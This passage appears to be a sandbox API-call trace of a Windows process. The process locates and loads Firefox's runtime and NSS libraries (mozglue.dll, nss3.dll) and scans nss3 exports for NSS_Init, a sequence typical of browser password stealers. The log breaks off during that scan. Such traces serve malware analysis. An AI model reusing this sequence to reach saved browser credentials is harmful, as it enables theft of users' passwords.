(lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.917] lstrlenW (lpString="90") returned 2 [0204.917] lstrcpyW (in: lpString1=0x2e20000, lpString2="90" | out: lpString1="90") returned="90" [0204.917] lstrlenW (lpString="90") returned 2 [0204.917] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned 44 [0204.917] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e500, dwLength=0x1c | out: lpBuffer=0x415e500*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.917] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0204.917] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.917] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp", lpString2="90" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90" [0204.917] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.918] lstrlenW (lpString=".dll") returned 4 [0204.918] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.918] lstrlenW (lpString=".dll") returned 4 [0204.918] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.918] lstrlenW (lpString=".dll") returned 4 [0204.918] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90") returned 46 [0204.918] VirtualQuery (in: lpAddress=0x3130000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x3130000, AllocationBase=0x3130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.918] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.919] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.919] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90", lpString2=".dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90.dll" [0204.919] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.920] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp90.dll") returned 0 [0204.921] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.921] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned 44 [0204.921] VirtualAlloc (lpAddress=0x0, dwSize=0x5a, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.921] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp" [0204.921] wsprintfW (in: param_1=0x415e558, param_2="%d" | out: param_1="100") returned 3 [0204.921] lstrlenW (lpString="100") returned 3 [0204.921] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.922] lstrlenW (lpString="100") returned 3 [0204.922] lstrcpyW (in: lpString1=0x2e20000, lpString2="100" | out: lpString1="100") returned="100" [0204.922] lstrlenW (lpString="100") returned 3 [0204.922] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp") returned 44 [0204.922] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415e500, dwLength=0x1c | out: lpBuffer=0x415e500*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.922] VirtualAlloc (lpAddress=0x0, dwSize=0x62, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0204.922] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.923] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp", lpString2="100" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100" [0204.923] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.923] lstrlenW (lpString=".dll") returned 4 [0204.923] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.923] lstrlenW (lpString=".dll") returned 4 [0204.923] lstrcpyW (in: lpString1=0x2df0000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.923] lstrlenW (lpString=".dll") returned 4 [0204.924] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100") returned 47 [0204.924] VirtualQuery (in: lpAddress=0x3130000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x3130000, AllocationBase=0x3130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.924] VirtualAlloc (lpAddress=0x0, dwSize=0x6a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.924] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.924] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100", lpString2=".dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll" [0204.924] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.925] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll") returned 1 [0204.926] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll") returned 51 [0204.926] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0204.926] lstrcpyW (in: lpString1=0x2df0000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll" [0204.926] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.927] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned 44 [0204.927] VirtualAlloc (lpAddress=0x0, dwSize=0x5a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.927] lstrcpyW (in: lpString1=0x2e20000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr" [0204.927] wsprintfW (in: param_1=0x415e558, param_2="%d" | out: param_1="90") returned 2 [0204.927] lstrlenW (lpString="90") returned 2 [0204.927] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0204.927] lstrlenW (lpString="90") returned 2 [0204.928] lstrcpyW (in: lpString1=0x3130000, lpString2="90" | out: lpString1="90") returned="90" [0204.928] lstrlenW (lpString="90") returned 2 [0204.928] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned 44 [0204.928] VirtualQuery (in: lpAddress=0x2e20000, lpBuffer=0x415e500, dwLength=0x1c | out: lpBuffer=0x415e500*(BaseAddress=0x2e20000, AllocationBase=0x2e20000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.928] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x3140000 [0204.928] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.928] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr", lpString2="90" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90" [0204.929] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.929] lstrlenW (lpString=".dll") returned 4 [0204.929] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.929] lstrlenW (lpString=".dll") returned 4 [0204.929] lstrcpyW (in: lpString1=0x2e20000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.929] lstrlenW (lpString=".dll") returned 4 [0204.929] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90") returned 46 [0204.929] VirtualQuery (in: lpAddress=0x3140000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x3140000, AllocationBase=0x3140000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.929] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0204.930] VirtualFree (lpAddress=0x3140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.930] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90", lpString2=".dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90.dll" [0204.930] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.931] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr90.dll") returned 0 [0204.931] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.931] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned 44 [0204.931] VirtualAlloc (lpAddress=0x0, dwSize=0x5a, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.931] lstrcpyW (in: lpString1=0x2e20000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr" [0204.931] wsprintfW (in: param_1=0x415e558, param_2="%d" | out: param_1="100") returned 3 [0204.932] lstrlenW (lpString="100") returned 3 [0204.932] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0204.932] lstrlenW (lpString="100") returned 3 [0204.932] lstrcpyW (in: lpString1=0x3130000, lpString2="100" | out: lpString1="100") returned="100" [0204.932] lstrlenW (lpString="100") returned 3 [0204.932] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr") returned 44 [0204.932] VirtualQuery (in: lpAddress=0x2e20000, lpBuffer=0x415e500, dwLength=0x1c | out: lpBuffer=0x415e500*(BaseAddress=0x2e20000, AllocationBase=0x2e20000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.932] VirtualAlloc (lpAddress=0x0, dwSize=0x62, flAllocationType=0x3000, flProtect=0x4) returned 0x3140000 [0204.932] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.932] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr", lpString2="100" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100" [0204.933] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.933] lstrlenW (lpString=".dll") returned 4 [0204.933] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.933] lstrlenW (lpString=".dll") returned 4 [0204.933] lstrcpyW (in: lpString1=0x2e20000, lpString2=".dll" | out: lpString1=".dll") returned=".dll" [0204.933] lstrlenW (lpString=".dll") returned 4 [0204.933] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100") returned 47 [0204.933] VirtualQuery (in: lpAddress=0x3140000, lpBuffer=0x415e70c, dwLength=0x1c | out: lpBuffer=0x415e70c*(BaseAddress=0x3140000, AllocationBase=0x3140000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.933] VirtualAlloc (lpAddress=0x0, dwSize=0x6a, flAllocationType=0x3000, flProtect=0x4) returned 0x3130000 [0204.934] VirtualFree (lpAddress=0x3140000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.934] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100", lpString2=".dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll" [0204.934] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.934] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll") returned 1 [0204.936] lstrlenW (lpString="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll") returned 51 [0204.936] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0204.936] lstrcpyW (in: lpString1=0x2e20000, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll") returned="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll" [0204.936] VirtualFree (lpAddress=0x3130000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.936] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\vcruntime140.dll") returned 0x0 [0204.937] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcr100.dll") returned 0x74960000 [0205.268] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\msvcp100.dll") returned 0x748f0000 [0205.798] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\mozglue.dll") returned 0x748c0000 [0206.059] LoadLibraryW (lpLibFileName="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll") returned 0x74700000 [0206.648] VirtualFree (lpAddress=0x3120000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.649] VirtualFree (lpAddress=0x3110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.649] VirtualFree (lpAddress=0x2f80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.649] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.650] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.650] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.650] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.651] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.651] lstrcmpA (lpString1="ATOB_AsciiToData", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="ATOB_AsciiToData_Util", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="ATOB_ConvertAsciiToItem", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="ATOB_ConvertAsciiToItem_Util", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="BTOA_ConvertItemToAscii", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="BTOA_ConvertItemToAscii_Util", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="BTOA_DataToAscii", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="BTOA_DataToAscii_Util", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddCertToListHead", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddCertToListSorted", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddCertToListTail", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddExtension", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddOCSPAcceptableResponses", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddOKDomainName", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AddRDN", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AllocCERTRevocationFlags", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_AsciiToName", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CRLCacheRefreshIssuer", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CacheCRL", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CacheOCSPResponseFromSideChannel", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CertChainFromCert", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CertListFromCert", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CertTimesValid", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_ChangeCertTrust", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CheckCertUsage", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CheckCertValidTimes", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CheckNameSpace", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_CheckOCSPStatus", lpString2="NSS_Init") returned -1 [0206.652] lstrcmpA (lpString1="CERT_ClearOCSPCache", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CompareCerts", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CompareName", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CompareValidityTimes", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CompleteCRLDecodeEntries", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_ConvertAndDecodeCertificate", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CopyName", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CopyRDN", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateAVA", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateCertificate", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateCertificateRequest", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateEncodedOCSPErrorResponse", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateEncodedOCSPSuccessResponse", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateName", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateOCSPCertID", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateOCSPRequest", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateOCSPSingleResponseGood", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateOCSPSingleResponseRevoked", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateOCSPSingleResponseUnknown", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateRDN", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateSubjectCertList", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_CreateValidity", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeAVAValue", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeAltNameExtension", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeAuthInfoAccessExtension", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeAuthKeyID", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeBasicConstraintValue", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeCRLDistributionPoints", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeCertFromPackage", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeCertPackage", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeCertificatePoliciesExtension", lpString2="NSS_Init") returned -1 [0206.653] lstrcmpA (lpString1="CERT_DecodeDERCrl", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeDERCrlWithFlags", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeGeneralName", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeNameConstraintsExtension", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeOCSPRequest", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeOCSPResponse", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeOidSequence", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodePrivKeyUsagePeriodExtension", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeTrustString", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DecodeUserNotice", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DerNameToAscii", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCERTRevocationFlags", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCertArray", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCertList", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCertificate", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCertificateList", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCertificatePoliciesExtension", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyCertificateRequest", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyName", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyOCSPCertID", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyOCSPRequest", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyOCSPResponse", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyOidSequence", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyUserNotice", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DestroyValidity", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DisableOCSPChecking", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DisableOCSPDefaultResponder", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DistNamesFromCertList", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DupCertList", lpString2="NSS_Init") returned -1 [0206.654] lstrcmpA (lpString1="CERT_DupCertificate", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_DupDistNames", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EnableOCSPChecking", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EnableOCSPDefaultResponder", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeAltNameExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeAndAddBitStrExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeAuthKeyID", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeBasicConstraintValue", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeCRLDistributionPoints", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeCertPoliciesExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeGeneralName", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeInfoAccessExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeInhibitAnyExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeNameConstraintsExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeNoticeReference", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeOCSPRequest", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodePolicyConstraintsExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodePolicyMappingExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeSubjectKeyID", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_EncodeUserNotice", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_ExtractPublicKey", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FilterCertListByCANames", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FilterCertListByUsage", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FilterCertListForUserCerts", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCRLEntryReasonExten", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCRLNumberExten", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertByDERCert", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertByIssuerAndSN", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertByName", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertByNickname", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertByNicknameOrEmailAddr", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertByNicknameOrEmailAddrForUsage", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertBySubjectKeyID", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertExtension", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindCertIssuer", lpString2="NSS_Init") returned -1 [0206.655] lstrcmpA (lpString1="CERT_FindKeyUsageExtension", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FindNameConstraintsExten", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FindSMimeProfile", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FindSubjectKeyIDExtension", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FindUserCertByUsage", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FindUserCertsByUsage", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FinishCertificateRequestAttributes", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FinishExtensions", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FormatName", lpString2="NSS_Init") returned -1 [0206.656] lstrcmpA (lpString1="CERT_FreeDistNames", lpString2="NSS_Init") returned -1 [0206.656] 